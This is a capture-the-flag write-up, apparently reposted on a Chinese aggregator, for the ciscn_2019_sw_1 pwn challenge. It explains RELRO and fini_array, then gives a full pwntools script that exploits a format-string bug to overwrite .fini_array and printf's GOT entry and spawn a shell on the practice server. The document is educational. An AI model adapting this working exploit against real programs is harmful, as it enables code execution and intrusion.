ciscn_2019_sw_1 Writeup
Posted Champa9ne
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ciscn_2019_sw_1 Writeup相关的知识,希望对你有一定的参考价值。
前提
- RELRO防御策略是当RELRO保护:
- 为NO RELRO的时候,
init.array、fini.array、got.plt均可读可写 - 为PARTIAL RELRO的时候,
ini.array、fini.array可读不可写,got.plt可读可写 - 为FULL RELRO时,
init.array、fini.array、got.plt均可读不可写。
- 为NO RELRO的时候,
- linux程序运行时:
- 在加载的时候,会依次调用
init.array数组中的每一个函数指针 - 在结束的时候,依次调用
fini.array中的每一个函数指针。
- 在加载的时候,会依次调用
- 当程序出现格式化字符串漏洞,但是至少需要写两次才能完成攻击。
- 当少于两个输入点时,可以考虑改写
fini.array中的函数指针为main函数地址,可以再执行一次main函数。 - 一般来说,这个数组的长度为1,也就是说只能写一个地址。[1]
- 当少于两个输入点时,可以考虑改写
程序逻辑
- 设置了数组存储上限
char format[68];且输入限制为__isoc99_scanf("%64s", format);。- 不存在越界输入。
- 输入的字符串只有64个字符。
- 存在输入字符串直接输出的情况
printf(format);。可能存在格式化字符漏洞。 - 存在函数
_sys,返回了return system(command);
思路
- 把
.fini_array覆盖为main,使得程序结束后可以再次重新启用。 - 把
printf_got覆盖为system_plt,使得第二次使用本程序中,跳转到printf()这一步时等效于执行system()。输入的参数即为system()的参数。 - 几个地址:
system().plt= 0x080483D0fini_array= 0x0804979Cprintf.got= 0x0804989Cmain()= 0x08048534
from pwn import *
context.log_level = "debug"
io = remote("node3.buuoj.cn",28414)
elf = ELF("./sw_1_ciscn_2019")
fini_array = 0x0804979C
printf_got = 0x0804989C
payload = p32(fini_array+2) + p32(printf_got+2)
payload += p32(printf_got) + p32(fini_array)
payload += "%"+str(0x0804-0x10)+"c" + "%4$hn"
payload += "%5$hn"
payload += "%"+str(0x83D0-0x0804)+"c" + "%6$hn"
payload += "%"+str(0x8534-0x83D0)+"c" + "%7$hn"
io.sendlineafter("Welcome to my ctf! What's your name?\\n",payload)
io.sendlineafter("Welcome to my ctf! What's your name?\\n","/bin/sh\\x00")
io.interactive()
[1] 参考自 LynneHuan,ciscn_2019_sw_1 https://www.cnblogs.com/LynneHuan/p/14660529.html
以上是关于ciscn_2019_sw_1 Writeup的主要内容,如果未能解决你的问题,请参考以下文章
&pwn1_sctf_2016 &ciscn_2019_n_1 &ciscn_2019_c_1 &ciscn_2019_en_2&